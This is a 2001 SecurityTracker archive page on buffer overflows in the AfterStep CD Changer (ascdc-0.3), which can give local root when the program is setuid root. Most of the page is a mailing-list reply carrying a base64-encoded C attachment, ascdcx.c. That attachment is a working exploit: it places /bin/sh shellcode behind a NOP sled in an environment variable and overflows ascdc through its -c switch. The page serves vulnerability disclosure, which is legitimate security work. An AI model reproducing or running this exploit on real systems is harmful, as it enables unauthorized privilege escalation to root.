SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   AfterStep CD Changer (ascdc) Vendors:   Malda, Rob
Re: AfterStep CD Changer for Linux/Unix Can Give Elevated Privileges (Possibly Root Privileges) to Local Users
SecurityTracker Alert ID:  1001064
SecurityTracker URL:  http://securitytracker.com/id/1001064
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 12 2001
Impact:   Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): ascdc-0.3
Description:   Wkit Security reports that there are multiple buffer overflows in the AfterStep CD Changer (ascdc) application that can be used to obtain elevated privileges, depending on how the application is configured.

See the original SecurityTracker Alert for more information.

See the reported e-mail below for demonstration exploit code using the "-c" switch.

Impact:   An authorized local user could obtain elevated privileges if the application is installed to be setuid root.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 12 2001 AfterStep CD Changer for Linux/Unix Can Give Elevated Privileges (Possibly Root Privileges) to Local Users



 Source Message Contents

Subject:  Re: ascdc Buffer Overflow Vulnerability


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--1087674738-257111439-984170536=:30047
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: 8bit            

On Thu, 8 Mar 2001 advisories@WKIT.COM wrote:

> TITLE:          ascdc Buffer Overflow Vulnerability
> ADVISORY ID:    WSIR-01/02-06
> CONTACT:        advisories@wkit.com, Wkit Security AB
> CLASS:          Buffer Overflow
> OBJECT:         ascdc (exec)
> VENDOR:         Rob Malda (http://www.CmdrTaco.net)
> REMOTE:         No
> LOCAL:          Yes
> VULNERABLE:     ascdc-0.3
> 
> 

Attaced is a working version of the exploit for ascdc-0.3 using the -c
switch this time.

--

- The Itch
	http://bse.die.ms

--1087674738-257111439-984170536=:30047
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; name="ascdcx.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0103092142160.30047@bse.die.ms>
Content-Description:
Content-Disposition: attachment; filename="ascdcx.c"

LyogL3Vzci9YMTFSNi9iaW4vYXNjZGMgbG9jYWwgZXhwbG9pdC4NCiAqICh2
ZXJzaW9uOiBhc2NkYy0wLjMtMi1pMzg2KQ0KICoNCiAqIFZ1bG5lcmFiaWxp
dHkgZm91bmQgYnkgQ2hyaXN0ZXIg1mJlcmcsIFdraXQgU2VjdXJpdHkgQUIg
DQogKg0KICogPGN1dCBhbmQgcGFzdGVkIGZyb20gdGhlIGFkdmlzb3J5IHBv
c3RlZCBvbiBidWd0cmFxPiANCiAqDQogKiBUaGVyZSBhcmUgbXVsdGlwbGUg
YnVmZmVyIG92ZXJmbG93cyBpbiBhc2NkYyB0aGF0IGNhbiBiZSBleHBsb2l0
ZWQgdG8gDQogKiBnYWluIHJvb3QgaWYgaXQgaXMgaW5zdGFsbGVkIHNldHVp
ZCByb290LiBJdCBpcyBOT1QgaW5zdGFsbGVkIHNldHVpZCByb290IA0KICog
YnkgZGVmYXVsdCBidXQgYXMgdGhlIFJFQURNRSBzYXlzOg0KICogIklmIHlv
dSBpbnRlbmQgdG8gdXNlIHRoZSBhdXRvbW91bnRpbmcgZmVhdHVyZSwgeW91
IG11c3QgZWl0aGVyIHJ1biANCiAqIGFzY2RjIGFzIHJvb3Qgb3Igc2V0dWlk
IGl0LiINCiAqDQogKiBHcmVldHogZmx5IG91dCB0bzogVGFzYywgQy1tdXJk
YWgsIENhbGltb25rLCBQeXJhLCBUb3p6LCBXaWxkY295b3RlLA0KICogICAg
ICAgICAgICAgICAgICAgIEx1Y2lwaGVyLCBTY3JpcHQwciwgWmVwaHlyLCBU
aGVQaWtlLCBLbjAwcCwgQ2VyaWFsDQogKgkJICAgICAgR29vbGllIGFuZCBY
LXdhcnRlY2guDQogKg0KICogLSBUaGUgSXRjaCAvIEJzRQ0KICogLSBodHRw
Oi8vYnNlLmRpZS5tcw0KICogLSBpcmMuYXhlbmV0Lm9yZyANCiAqLw0KIA0K
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQogDQoj
ZGVmaW5lIERFRkFVTFRfRUdHX1NJWkUgMjA0OA0KI2RlZmluZSBOT1AgMHg5
MA0KDQovKiBhZGp1c3QgaWYgbmVlZGVkLCB0aGlzIHNob3VsZCBiZSBzdWZm
aWVudCAqLw0KI2RlZmluZSBERUZBVUxUX0JVRkZFUl9TSVpFIDYwMA0KIA0K
dW5zaWduZWQgbG9uZyBnZXRfc3Aodm9pZCkNCnsNCiAgICAgICAgX19hc21f
XygibW92bCAlZXNwLCAlZWF4Iik7DQp9DQoNCmNoYXIgc2hlbGxjb2RlW10g
PQ0KICAgICAgICAiXHgzMVx4YzBceDMxXHhkYlx4YjBceDE3XHhjZFx4ODAi
DQogICAgICAgICJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4
ODhceDQ2XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KICAgICAgICAiXHg4
OVx4ZjNceDhkXHg0ZVx4MDhceDhkXHg1Nlx4MGNceGNkXHg4MFx4MzFceGRi
XHg4OVx4ZDhceDQwXHhjZCINCiAgICAgICAgIlx4ODBceGU4XHhkY1x4ZmZc
eGZmXHhmZi9iaW4vc2giOyAgDQoNCmludCBtYWluKGludCBhcmdjLCBjaGFy
ICphcmd2W10pDQp7DQogICAgICAgIGNoYXIgKmJ1ZmY7DQogICAgICAgIGNo
YXIgKmVnZzsNCiAgICAgICAgY2hhciAqcHRyOw0KICAgICAgICBsb25nICph
ZGRyX3B0cjsNCiAgICAgICAgbG9uZyBhZGRyOw0KICAgICAgICBpbnQgYnNp
emUgPSBERUZBVUxUX0JVRkZFUl9TSVpFOw0KICAgICAgICBpbnQgZWdnc2l6
ZSA9IERFRkFVTFRfRUdHX1NJWkU7DQogICAgICAgIGludCBpOw0KIA0KCWlm
KGFyZ2MgPiAxKSB7IGJzaXplID0gYXRvaShhcmd2WzFdKTsgfQ0KDQoJaWYo
IShidWZmID0gbWFsbG9jKGJzaXplKSkpDQoJew0KCQlwcmludGYoInVuYWJs
ZSB0byBhbGxvY2F0ZSBtZW1vcnkgZm9yICVkIGJ5dGVzXG4iLCBic2l6ZSk7
DQoJCWV4aXQoMSk7DQoJfQ0KDQoJaWYoIShlZ2cgPSBtYWxsb2MoZWdnc2l6
ZSkpKQ0KCXsNCgkgCXByaW50ZigidW5hYmxlIHRvIGFsbG9jYXRlIG1lbW9y
eSBmb3IgJWQgYnl0ZXNcbiIsIGVnZ3NpemUpOw0KIAkJZXhpdCgxKTsNCgl9
DQoNCiAgICAgICAgYWRkciA9IGdldF9zcCgpOw0KIA0KCXByaW50ZigiL3Vz
ci9YMTFSNi9iaW4vYXNjZGMgbG9jYWwgZXhwbG9pdC5cbiIpOw0KCXByaW50
ZigiQ29kZWQgYnkgVGhlIEl0Y2ggLyBCc0VcblxuIik7DQogICAgICAgIHBy
aW50ZigiVXNpbmcgcmV0dXJuIGFkZHJlc3M6IDB4JXhcbiIsIGFkZHIpOw0K
ICAgICAgICBwcmludGYoIlVzaW5nIGJ1ZmZlcnNpemUgICAgOiAlZFxuIiwg
YnNpemUpOw0KIA0KICAgICAgICBwdHIgPSBidWZmOw0KICAgICAgICBhZGRy
X3B0ciA9IChsb25nICopIHB0cjsgIA0KICAgICAgICBmb3IoaSA9IDA7IGkg
PCBic2l6ZTsgaSs9NCkgeyAqKGFkZHJfcHRyKyspID0gYWRkcjsgfQ0KIA0K
ICAgICAgICBwdHIgPSBlZ2c7DQogICAgICAgIGZvcihpID0gMDsgaSA8IGVn
Z3NpemUgLSBzdHJsZW4oc2hlbGxjb2RlKSAtMTsgaSsrKSANCgl7IA0KCQkq
KHB0cisrKSA9IE5PUDsgDQoJfSANCg0KCWZvcihpID0gMDsgaSA8IHN0cmxl
bihzaGVsbGNvZGUpOyBpKyspIA0KCXsgDQoJCSoocHRyKyspID0gc2hlbGxj
b2RlW2ldOw0KCX0NCg0KICAgICAgICBidWZmW2JzaXplIC0gMV0gPSAnXDAn
Ow0KICAgICAgICBlZ2dbZWdnc2l6ZSAtIDFdID0gJ1wwJzsNCiAgICAgICAg
bWVtY3B5KGVnZywgIkVHRz0iLCA0KTsNCiAgICAgICAgcHV0ZW52KGVnZyk7
DQogICAgICAgIG1lbWNweShidWZmLCAiUkVUPSIsIDQpOw0KICAgICAgICBw
dXRlbnYoYnVmZik7DQogDQogICAgICAgIHN5c3RlbSgiL3Vzci9YMTFSNi9i
aW4vYXNjZGMgLWMgJFJFVCIpOw0KIA0KICAgICAgICByZXR1cm4gMDsNCn0g
ICAgICANCg0KLyogcmVtZW1iZXIsIHRoZXJlJ3Mgbm8gY3VyZSBmb3IgQnNF
ICovDQo=
--1087674738-257111439-984170536=:30047--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC